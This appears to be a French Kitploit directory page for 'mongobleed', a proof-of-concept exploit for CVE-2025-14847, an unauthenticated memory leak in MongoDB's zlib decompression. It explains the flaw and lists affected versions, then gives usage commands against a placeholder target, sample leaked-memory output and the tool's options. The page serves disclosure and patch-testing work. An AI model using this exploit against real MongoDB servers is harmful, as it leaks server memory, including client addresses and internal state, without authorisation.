Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
mongobleed | Kitploit
Outils/GitHubGitHub/joe-desimone/mongobleed
Criminalistique MémoireAnalyse des VulnérabilitésExploitationCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubjoe-desimone/mongobleed

mongobleed

Voir le dépôt
943168il y a 7 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

mongobleed

CVE-2025-14847 - Exploit de fuite de mémoire MongoDB sans authentification

Un exploit de preuve de concept de la vulnérabilité de décompression zlib de MongoDB qui permet à des attaquants sans authentification de divulguer la mémoire sensible du serveur.

Vulnérabilité

Un défaut dans la décompression des messages zlib de MongoDB renvoie la taille du tampon alloué au lieu de la longueur réelle des données décompressées. Cela permet aux attaquants de lire de la mémoire non initialisée en :

  1. Envoyant un message compressé avec une déclaration uncompressedSize gonflée
  2. MongoDB alloue un grand tampon en fonction de la déclaration de l'attaquant
  3. zlib décompresse les données réelles au début du tampon
  4. Le bug amène MongoDB à traiter l'intégralité du tampon comme des données valides
  5. L'analyse BSON lit les « noms de champs » depuis la mémoire non initialisée jusqu'aux octets nuls

Versions concernées

VersionAffectéeCorrigée
8.2.x8.2.0 - 8.2.28.2.3
8.0.x8.0.0 - 8.0.168.0.17
7.0.x7.0.0 - 7.0.277.0.28
6.0.x6.0.0 - 6.0.266.0.27
5.0.x5.0.0 - 5.0.315.0.32

Utilisation

root@kitploit:~
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>

# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000

# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000

Options

Exemple de sortie

root@kitploit:~
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Author: Joe Desimone - x.com/dez_
[*] Target: localhost:27017
[*] Scanning offsets 20-50000

[+] offset=  117 len=  39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: Recv SyncookiesFailed EmbryonicRsts ...

[*] Total leaked: 8748 bytes
[*] Unique fragments: 42
[*] Saved to: leaked.bin

Environnement de test

Un fichier Docker Compose est inclus pour démarrer une instance MongoDB vulnérable :

root@kitploit:~
docker-compose up -d
python3 mongobleed.py

Comment ça marche

L'exploit fabrique des documents BSON avec des champs de longueur gonflés. Lorsque le serveur analyse ces documents, il lit les noms de champs depuis la mémoire non initialisée jusqu'à ce qu'il rencontre un octet nul. Chaque sonde à un décalage différent peut fuiter différentes régions mémoire.

Les données fuitées peuvent inclure :

  • Les journaux internes et l'état de MongoDB
  • La configuration du moteur de stockage WiredTiger
  • Les données système /proc (meminfo, statistiques réseau)
  • Les chemins des conteneurs Docker
  • Les UUID de connexion et les adresses IP des clients

Références

  • Avis de sécurité OX Security
  • Commit de correction MongoDB

Auteur

Joe Desimone - x.com/dez_

Avertissement

Cet outil est réservé aux tests de sécurité autorisés uniquement. L'accès non autorisé aux systèmes informatiques est illégal.

Télécharger l’outil
OptionDéfautDescription
--hostlocalhostHôte MongoDB cible
--port27017Port MongoDB cible
--min-offset20Longueur minimale de document à sonder
--max-offset8192Longueur maximale de document à sonder
--outputleaked.binFichier de sortie pour les données fuitées